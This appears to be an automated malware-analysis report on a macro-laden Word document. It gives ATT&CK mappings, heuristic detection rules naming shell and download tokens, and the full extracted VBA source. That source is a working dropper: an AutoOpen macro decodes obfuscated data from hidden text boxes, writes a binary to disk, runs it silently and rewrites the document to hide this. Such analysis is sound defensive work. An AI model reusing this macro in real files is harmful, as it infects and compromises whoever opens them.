MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains VBA macros, including an AutoOpen subroutine, which is a common technique for executing malicious code upon document opening. The script utilizes Base64 decoding and XOR obfuscation to hide its payload, which is then likely executed via CreateObject. This indicates the document is designed to download and run a secondary malicious component.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set xmlDoc = CreateObject("MSXML2.DOMDocument") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2918 bytes |
SHA-256: 53eaadad198752eaaf33f8504dd37e174992c8ac25ebe53bf3e471a3ba748521 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Function Base64Decode(base64 As String) As Variant
Dim xmlDoc As Object
Dim xmlNode As Object
Set xmlDoc = CreateObject("MSXML2.DOMDocument")
Set xmlNode = xmlDoc.createElement("b64")
xmlNode.dataType = "bin.base64"
xmlNode.Text = base64
Base64Decode = xmlNode.nodeTypedValue
End Function
Private Function GetStringData(data As String) As String
Dim decData As Variant
Dim nLen As Long
Dim strPath As String
decData = Base64Decode(data)
nLen = UBound(decData) - LBound(decData) + 1
strPath = ""
For inx = 0 To nLen - 1
strPath = strPath & Chr((decData(inx) Xor 37) + 134 - 256)
Next inx
GetStringData = strPath
End Function
Private Function GetBufferData(data As String) As Variant
Dim decData As Variant
Dim nLen As Long
decData = Base64Decode(data)
nLen = UBound(decData) - LBound(decData) + 1
For inx = 0 To nLen - 1
If ((decData(inx) Xor 214) + 55) > 255 Then
decData(inx) = (decData(inx) Xor 214) + 55 - 256
Else
decData(inx) = (decData(inx) Xor 214) + 55
End If
Next inx
GetBufferData = decData
End Function
Sub AutoOpen()
'
' AutoOpen Macro
'
'
Dim strPath As String
Dim strArgment As String
Dim DataBuffer As Variant
Dim PBuffer() As Byte
Dim strObject As String
If ActiveDocument.Shapes.Count < 1 Then Exit Sub
strPath = GetStringData(ActiveDocument.Shapes("Text Box 3").TextFrame.TextRange.Text)
strArgment = GetStringData(ActiveDocument.Shapes("Text Box 4").TextFrame.TextRange.Text)
DataBuffer = GetBufferData(ActiveDocument.Shapes("Text Box 5").TextFrame.TextRange.Text)
nLen = UBound(DataBuffer) - LBound(DataBuffer) + 1
strObject = GetStringData(ActiveDocument.Shapes("Text Box 6").TextFrame.TextRange.Text)
ReDim PBuffer(nLen)
For inx = 0 To nLen - 1
PBuffer(inx) = DataBuffer(inx)
Next inx
Open strPath For Binary Lock Write As #1
Put #1, 1, PBuffer
Close #1
ActiveDocument.Shapes("Text Box 2").Select
Selection.ShapeRange.TextFrame.TextRange.Select
Selection.Collapse
Selection.WholeStory
Selection.Copy
Selection.ShapeRange.Select
Selection.MoveUp Unit:=wdScreen, Count:=1
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Selection.PasteAndFormat (wdFormatOriginalFormatting)
ActiveDocument.Save
Set objShell = CreateObject(strObject)
objShell.Run strArgment, 0, False
Set objShell = Nothing
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.